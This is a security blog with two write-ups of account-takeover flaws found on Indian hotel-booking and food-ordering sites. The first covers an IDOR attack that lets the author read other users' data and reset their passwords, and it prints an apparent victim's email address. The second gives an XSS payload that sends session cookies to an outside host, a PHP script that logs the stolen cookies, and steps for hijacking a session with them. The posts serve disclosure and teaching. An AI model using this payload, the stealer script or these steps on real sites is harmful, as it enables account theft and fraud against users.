Sunday, 15 May 2016

User Account Hijack via IDOR

Hi All,

One more day of hack!

While researching for vulnerabilities, I have found a very critical vulnerability of Insecure Direct Object Reference(IDOR) in one of the Hotel Booking websites by which I was able to hijack any user account. 

What is IDOR?
Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying value of a parameter used to directly point to an object. This is caused by the fact that the application takes input from the user and without performing any authorization check allow the user the access to the object.
This is occupying the fourth spot in Open Web Application Security Project(OWASP) Top 10 list of the most critical web application security risks since 2007.

I found this vulnerability in one Hotel Booking company of India. I was able to completely compromise any user account provided the mail id of the user.


Below are the steps- 

1. I created my account , and went to my profile section where I found different functionalities like  "Wallet Money" , "My bookings" just like every travel booking websites have.

2. Captured the request by clicking on "Wallet Money" functionality and found that there was a parameter containing mail id  i.e emailId.



The response to the request is the credit balance that the user has in his wallet.



3- Seeing this, I changed the mail id to some other mail id (obviously to one who has account in this website) and found that I was able to check wallet money of the user associated to that mail id.

I changed the mail id to victim mail address and I got the below response-



         







4- And similarly "My booking" functionality was vulnerable to IDOR where I could see the bookings made by the user by modifying the mail id . Then I went further, and tried to hijack user account using "New Password" functionality .

From the above two scenario, I found that there was no mapping of user mail id with any authentication token and there was no authorized check where the user has access to particular object or not.

5- I checked the "My Profile" section where I could change the current password ,captured the raw request.
            
   










6- Now as you can seen in the request, there are some parameter like FirstName,LastName, Email, Password, NewEmail.

Now I changed the "Email" parameter to victim mail id i,e moneyjain030193@gmail.com and kept the password of my choice i.e. 123456 and as I was expecting, I got 200 ok. 























and with no surprise I was able to log in successfully with the Victim id and with the password that I have chosen for him. 


That's all about this IDOR vulnerability ,simple yet critical.

Suggestions and feedback are welcome :)

Sunday, 20 December 2015

User Account Hijack via XSS

Hi All,

This blog is about How I managed to hijack user account by exploiting XSS vulnerability in one of the biggest online food company of India. (Can't disclose the name for obvious reason)


Cross site scripting (XSS) is one of the most rampant and yet most underdetermined of web application vulnerabilities.Theft of cookies, personal data, authentication credentials and browser history are probably the less dangerous consequences of XSS attacks.Recently while working on web application vulnerabilities, I found XSS vulnerability in one most popular online food ordering website of India and when I paired it with some social engineering attacks, I was able to takeover user account .


So here are the steps-


1- First I discovered XSS vulnerability in the website.

Couldn't show the POC for it as it got patched.

The basic motive was to get user cookies, so for this, I did the following two steps-



  • Created a payload which could extract user cookies from the browser.
Payload- "><img src='aa' onerror="this.src='http://mywebsite.com/anyfile.php?cookie='+document.cookie+">
  • Developed a php code to get the user cookies to my mail account.
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("log.txt", "a");
fwrite($steal, $cookie ."\n");
fclose($steal);
?>


2- So the vulnerable link looked like


https://thevulnerablesite.com/asian?vulnerableparameter="><img src='aa' onerror="this.src='http://mywebsite.com/anyfile.php?cookie='+document.cookie+">


The next step is to lure the user to click on it.


Note- User must be logged into the vulnerable website. Basically user cookies must be saved into user browser.

As user clicks on the malicious link sent to him by the attacker (as here I was the attacker) , I was able to get user cookies in my mailbox.


3- Open your browser (prefer mozilla firefox).Inject the captured cookies using any cookie editor like cookie manager into your browser.






Once you have done, reload the browser and here you are successfully logged in as victim user, having full access over his account.






By XSS attack, I have gained full access to victim user account, can make orders, cancel it, change the mobile number and perform payment too from his account.

I reported this vulnerability to the concerned organisation on 1st August 2015 and it got patched in December.

That's all folk about this vulnerability.
Thanks.
-logicbomb

Suggestions and Feedbacks are welcome. :)